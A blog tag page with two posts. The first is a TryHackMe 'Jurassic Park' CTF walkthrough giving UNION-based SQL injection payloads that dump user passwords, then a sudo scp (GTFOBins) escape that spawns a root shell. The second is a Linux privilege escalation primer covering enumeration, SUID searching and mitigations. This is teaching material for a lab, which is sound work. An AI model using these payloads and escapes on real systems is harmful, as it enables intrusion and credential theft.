Skip to main content

2 posts tagged with "privilege-escalation"

View All Tags

Jurassic Park → TryHackMe

Shubham
Cybersecurity Enthusiast

Jurassic Park TryHackMe

login : ssh dennis@<TARGET_IP>
password : (Obtained via SQL Injection in the web application)

Task

The objective is to find multiple flags scattered across the machine by exploiting a vulnerable web application to gain a foothold, and subsequently abusing sudo privileges to escalate to root.

Quick theory

When a web application takes user input and passes it directly into a database query without sanitization, it becomes vulnerable to SQL Injection (SQLi). You can use UNION based SQLi to append your own queries and dump database credentials.

Once inside a system, privilege escalation can often be achieved by checking what commands the current user can run as root using sudo -l. If a permitted binary has known bypasses, tools like GTFOBins provide command snippets to exploit them and spawn a root shell.

Tools you’ll use:
Burp Suite -> to capture, modify, and fuzz HTTP requests (Intruder/Repeater).
SQLi (Manual) -> to enumerate database columns, tables, and dump passwords.
scp (via GTFOBins) -> to escalate privileges to root.

Solution

# 1. After an Nmap scan reveals port 80 and 22, visit the web app.
# The 'id' parameter in the shop package URL is vulnerable to SQLi.
# Determine the number of columns (fails at 6, meaning there are 5 columns):
?id=1+ORDER+BY+6
# 2. Extract database tables and column names:
?id=1+UNION+SELECT+1,table_name,3,4,5+FROM+information_schema.tables+WHERE+table_schema=database()
?id=1+UNION+SELECT+1,column_name,3,4,5+FROM+information_schema.columns+WHERE+table_name="users"+AND+table_schema=database()
# 3. Dump the password from the users table:
?id=1+UNION+SELECT+1,password,3,password,5+FROM+users
# 4. Use Burp Intruder to fuzz the 'id' parameter from 0-50 to find the valid user "dennis".
# Log in via SSH using the dumped credentials:
neocipher27@fedora:~$ ssh dennis@<TARGET_IP>
# Capture the first flag in the user's directory.
# 5. Check bash history for the third flag and hints for the fifth flag:
dennis@jurassic:~$ cat .bash_history
# OR
dennis@jurassic:~$ history
# 6. Check for sudo privileges to escalate to root:
dennis@jurassic:~$ sudo -l
# Output shows 'scp' can be run as root without a password.
# 7. Exploit scp using GTFOBins to spawn a root shell:
dennis@jurassic:~$ TF=$(mktemp)
dennis@jurassic:~$ echo 'sh 0<&2 1>&2' > $TF
dennis@jurassic:~$ chmod +x "$TF"
dennis@jurassic:~$ sudo scp -S $TF x y:
# 8. Capture the fifth flag in the root directory:
root@jurassic:~# cat /root/flag5.txt
# 9. Find the remaining flags (flag 2 is inside the ubuntu user's bash history):
root@jurassic:~# cat /home/ubuntu/.bash_history

Linux Privilege Escalation

Shubham
Cybersecurity Enthusiast

Note: This blog is made by taking reference from: Delinea blog on Linux Privilege Escalation.

What is Privilege Escalation?

Privilege escalation occurs when an attacker gains access to a limited user account and attempts to elevate their permissions to a higher level (typically root).

  • Vertical Escalation: A user with lower privileges attempts to gain higher privileges (e.g., a standard user becoming root).
  • Horizontal Escalation: An attacker takes over another user's account with similar privileges but different access rights (e.g., accessing a database admin's account).

Core Concepts & File Structures

Understanding how Linux handles users and permissions is critical for both exploitation and defense.

Key Files

  • /etc/passwd: Lists all users on the system.
    • Format: Username:PasswordPlaceholder:UID:GID:Info:Home:Shell
  • /etc/shadow: Stores encrypted password hashes (readable only by root).
  • /etc/group: Defines user groups.

Permissions

  • r (Read): 4
  • w (Write): 2
  • x (Execute): 1
  • Special Bits:
    • SUID (Set User ID): Runs the file with the permissions of the file owner (often root).
    • SGID (Set Group ID): Runs the file with the permissions of the group.
image

source : https://drive.google.com/file/d/1I-diu5547PiQ9p_xnN5l7lhG31WWrsf6/view

Enumeration: The First Step

Before escalating, you must understand the environment.

Manual Enumeration Commands

CommandDescription
idPrint real and effective user/group IDs.
whoamiDisplay current username.
hostnameShow the system's hostname.
uname -aPrint system and kernel information.
ps -efSnapshot of current processes.
echo $PATHPrint environment PATH variable.
ifconfig / ip aNetwork interface configuration.
cat /etc/passwdView user list.
sudo -lList commands the user can run as sudo.

Finding SUID/SGID Files

Command to find all files with SUID or SGID bits set:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Automated Enumeration Tools

These scripts automate the discovery of potential vectors:

  • LinPEAS (Linux Privilege Escalation Awesome Script)
  • LinEnum
  • Linux Smart Enumeration
  • Linux Exploit Suggester 2

Common Escalation Techniques

1. Kernel Exploits

Attackers look for outdated kernel versions with known vulnerabilities (e.g., Dirty COW).

  • Detection: Check uname -r and search exploit databases.

2. Abuse of Sudo Rights

If a user is allowed to run specific commands via sudo without a password (checked via sudo -l), they might break out of that command to spawn a root shell.

  • Example: Using vim or less to execute shell commands.

3. SUID/SGID Binaries

Executables with the SUID bit set run with the owner's privileges. If a binary is owned by root and has SUID set, exploiting it can yield root access.

4. Misconfigurations

  • Weak File Permissions: Sensitive files (like /etc/shadow) being readable or writable by standard users.
  • Cron Jobs: Scripts running as root that are writable by standard users.
  • Cleartext Passwords: Credentials left in config files, history files, or scripts.

Prevention & Mitigation

To secure Linux systems against these attacks:

  • Least Privilege: Ensure users only have the permissions necessary for their role.
  • Patch Management: Keep the Kernel and applications updated.
  • Secure Passwords: Use strong passwords and store them in PAM/Vault solutions rather than cleartext.
  • Audit Sudoers: Regularly check /etc/sudoers and remove unnecessary entries.
  • Monitor Logs: Use tools to audit and log privileged access usage.
  • MFA: Implement Multi-Factor Authentication for access points.